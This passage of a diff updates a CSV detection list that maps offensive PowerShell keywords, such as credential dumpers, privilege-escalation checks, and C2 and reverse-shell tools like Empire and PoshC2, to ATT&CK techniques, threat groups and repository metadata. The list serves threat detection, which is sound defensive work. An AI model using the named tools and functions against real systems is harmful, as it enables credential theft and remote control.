CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik 
Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","Invoke-Vnc.ps1","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" -"*Invoke-Vnc.ps1*","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1087","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*Invoke-VaultCredCheck*","offensive_tool_keyword","PrivescCheck","Privilege Escalation Enumeration Script for Windows","T1053 - T1088","TA0005 - TA0004","N/A","N/A","Privilege 
Escalation","https://github.com/itm4n/PrivescCheck","1","1","N/A","N/A","10","2254","370","2023-09-03T15:14:46Z","2020-01-16T12:28:10Z" +"*Invoke-VaultListCheck*","offensive_tool_keyword","PrivescCheck","Privilege Escalation Enumeration Script for Windows","T1053 - T1088","TA0005 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrivescCheck","1","1","N/A","N/A","10","2254","370","2023-09-03T15:14:46Z","2020-01-16T12:28:10Z" +"*Invoke-Vnc*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - 
","Frameworks","https://github.com/EmpireProject/Empire","1","1","Invoke-Vnc.ps1","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*Invoke-Vnc.ps1*","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1087","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*Invoke-VNCServer.ps1*","offensive_tool_keyword","AutoRDPwn","AutoRDPwn is a post-exploitation framework created in Powershell designed primarily to automate the Shadow attack on Microsoft Windows computers","T1078 - T1021.001 - 
T1003.001 - T1547.009 - T1543.003 - T1056.001 - T1021.002","TA0004 - TA0003 - TA0006 - TA0002 - TA0008","N/A","N/A","Frameworks","https://github.com/JoelGMSec/AutoRDPwn","1","1","N/A","N/A","10","1009","830","2022-09-04T20:44:27Z","2018-07-29T08:22:20Z" "*Invoke-VNCViewer.ps1*","offensive_tool_keyword","AutoRDPwn","AutoRDPwn is a post-exploitation framework created in Powershell designed primarily to automate the Shadow attack on Microsoft Windows computers","T1078 - T1021.001 - T1003.001 - T1547.009 - T1543.003 - T1056.001 - T1021.002","TA0004 - TA0003 - TA0006 - TA0002 - TA0008","N/A","N/A","Frameworks","https://github.com/JoelGMSec/AutoRDPwn","1","1","N/A","N/A","10","1009","830","2022-09-04T20:44:27Z","2018-07-29T08:22:20Z" -"*Invoke-VoiceTroll.ps1*","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1073","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" -"*Invoke-Vulmap*","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","2960","495","2023-07-13T14:09:33Z","2018-03-07T12:51:25Z" -"*Invoke-VulnerableADCSTemplates*","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation 
Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","2960","495","2023-07-13T14:09:33Z","2018-03-07T12:51:25Z" -"*Invoke-watson*","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","2960","495","2023-07-13T14:09:33Z","2018-03-07T12:51:25Z" +"*Invoke-VoiceTroll.ps1*","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1073","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - 
","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*Invoke-Vulmap*","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","2961","495","2023-07-13T14:09:33Z","2018-03-07T12:51:25Z" +"*Invoke-VulnerableADCSTemplates*","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","2961","495","2023-07-13T14:09:33Z","2018-03-07T12:51:25Z" +"*Invoke-watson*","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","2961","495","2023-07-13T14:09:33Z","2018-03-07T12:51:25Z" "*Invoke-WCMDump*","offensive_tool_keyword","Invoke-WCMDump","PowerShell script to dump Windows credentials from the Credential Manager Invoke-WCMDump enumerates Windows credentials in the Credential Manager and then extracts available information about each one. Passwords are retrieved for Generic type credentials. but can not be retrived by the same method for Domain type credentials. 
Credentials are only returned for the current user","T1003 - T1003.003 - T1003.001 - T1552","TA0006 - TA0006 - TA0006 - TA0006","N/A","N/A","Credential Access","https://github.com/peewpw/Invoke-WCMDump","1","1","N/A","N/A","8","708","132","2017-12-12T00:46:33Z","2017-12-09T21:36:59Z" -"*Invoke-WCMDump*","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","2960","495","2023-07-13T14:09:33Z","2018-03-07T12:51:25Z" +"*Invoke-WCMDump*","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","2961","495","2023-07-13T14:09:33Z","2018-03-07T12:51:25Z" "*Invoke-WebRequest https://tinyurl.com/*","offensive_tool_keyword","C2_Server","C2 server to connect to a victim machine via reverse shell","T1090 - T1090.001 - T1071 - T1071.001","TA0011 ","N/A","N/A","C2","https://github.com/reveng007/C2_Server","1","0","N/A","10","10","31","17","2022-02-27T02:00:02Z","2021-03-05T12:35:45Z" "*Invoke-WebRev.ps1*","offensive_tool_keyword","AutoRDPwn","AutoRDPwn is a post-exploitation framework created in Powershell designed primarily to automate the Shadow attack on Microsoft Windows computers","T1078 - T1021.001 - T1003.001 - T1547.009 - T1543.003 - T1056.001 - T1021.002","TA0004 - TA0003 - TA0006 - TA0002 - TA0008","N/A","N/A","Frameworks","https://github.com/JoelGMSec/AutoRDPwn","1","1","N/A","N/A","10","1009","830","2022-09-04T20:44:27Z","2018-07-29T08:22:20Z" -"*Invoke-Whisker*","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 
- T1055.012","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","1","N/A","10","10","1257","284","2023-03-01T17:10:43Z","2020-04-06T16:34:52Z" -"*Invoke-WindowsUpdateCheck*","offensive_tool_keyword","PrivescCheck","Privilege Escalation Enumeration Script for Windows","T1053 - T1088","TA0005 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrivescCheck","1","1","N/A","N/A","10","2247","370","2023-09-03T15:14:46Z","2020-01-16T12:28:10Z" -"*Invoke-WinEnum*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - 
","Frameworks","https://github.com/EmpireProject/Empire","1","1","Invoke-WinEnum.ps1","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" -"*Invoke-WinEnum.ps1*","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1145","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*Invoke-Whisker*","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","N/A","Exploitation 
tools","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","1","N/A","10","10","1260","284","2023-03-01T17:10:43Z","2020-04-06T16:34:52Z" +"*Invoke-WindowsUpdateCheck*","offensive_tool_keyword","PrivescCheck","Privilege Escalation Enumeration Script for Windows","T1053 - T1088","TA0005 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrivescCheck","1","1","N/A","N/A","10","2254","370","2023-09-03T15:14:46Z","2020-01-16T12:28:10Z" +"*Invoke-WinEnum*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - 
","Frameworks","https://github.com/EmpireProject/Empire","1","1","Invoke-WinEnum.ps1","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*Invoke-WinEnum.ps1*","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1145","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*Invoke-WinlogonCheck*","offensive_tool_keyword","AutoRDPwn","AutoRDPwn is a post-exploitation framework created in Powershell designed primarily to automate the Shadow attack on Microsoft Windows computers","T1078 - 
T1021.001 - T1003.001 - T1547.009 - T1543.003 - T1056.001 - T1021.002","TA0004 - TA0003 - TA0006 - TA0002 - TA0008","N/A","N/A","Frameworks","https://github.com/JoelGMSec/AutoRDPwn","1","1","N/A","N/A","10","1009","830","2022-09-04T20:44:27Z","2018-07-29T08:22:20Z" -"*Invoke-WinlogonCheck*","offensive_tool_keyword","PrivescCheck","Privilege Escalation Enumeration Script for Windows","T1053 - T1088","TA0005 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrivescCheck","1","1","N/A","N/A","10","2247","370","2023-09-03T15:14:46Z","2020-01-16T12:28:10Z" -"*Invoke-winPEAS*","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","1","N/A","10","10","1257","284","2023-03-01T17:10:43Z","2020-04-06T16:34:52Z" -"*Invoke-winPEAS*","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","2960","495","2023-07-13T14:09:33Z","2018-03-07T12:51:25Z" -"*invoke-winrmsession*","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - 
HEXANE","C2","https://github.com/nettitude/PoshC2","1","1","N/A","10","10","1601","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" -"*Invoke-WireTap*","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","1","N/A","10","10","1257","284","2023-03-01T17:10:43Z","2020-04-06T16:34:52Z" -"*Invoke-WlanProfilesCheck*","offensive_tool_keyword","PrivescCheck","Privilege Escalation Enumeration Script for Windows","T1053 - T1088","TA0005 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrivescCheck","1","1","N/A","N/A","10","2247","370","2023-09-03T15:14:46Z","2020-01-16T12:28:10Z" -"*Invoke-WmiCommand *","offensive_tool_keyword","PowerSploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. 
PowerSploit is comprised of the following modules and scripts","T1059 - T1053 - T1003 - T1114 - T1204","TA0002 - TA0008 - TA0011","N/A","N/A","Frameworks","https://github.com/PowerShellMafia/PowerSploit","1","0","N/A","10","10","10978","4550","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z" +"*Invoke-WinlogonCheck*","offensive_tool_keyword","PrivescCheck","Privilege Escalation Enumeration Script for Windows","T1053 - T1088","TA0005 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrivescCheck","1","1","N/A","N/A","10","2254","370","2023-09-03T15:14:46Z","2020-01-16T12:28:10Z" +"*Invoke-winPEAS*","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","1","N/A","10","10","1260","284","2023-03-01T17:10:43Z","2020-04-06T16:34:52Z" +"*Invoke-winPEAS*","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","2961","495","2023-07-13T14:09:33Z","2018-03-07T12:51:25Z" +"*invoke-winrmsession*","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - 
HEXANE","C2","https://github.com/nettitude/PoshC2","1","1","N/A","10","10","1602","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" +"*Invoke-WireTap*","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","1","N/A","10","10","1260","284","2023-03-01T17:10:43Z","2020-04-06T16:34:52Z" +"*Invoke-WlanProfilesCheck*","offensive_tool_keyword","PrivescCheck","Privilege Escalation Enumeration Script for Windows","T1053 - T1088","TA0005 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrivescCheck","1","1","N/A","N/A","10","2254","370","2023-09-03T15:14:46Z","2020-01-16T12:28:10Z" +"*Invoke-WmiCommand *","offensive_tool_keyword","PowerSploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. 
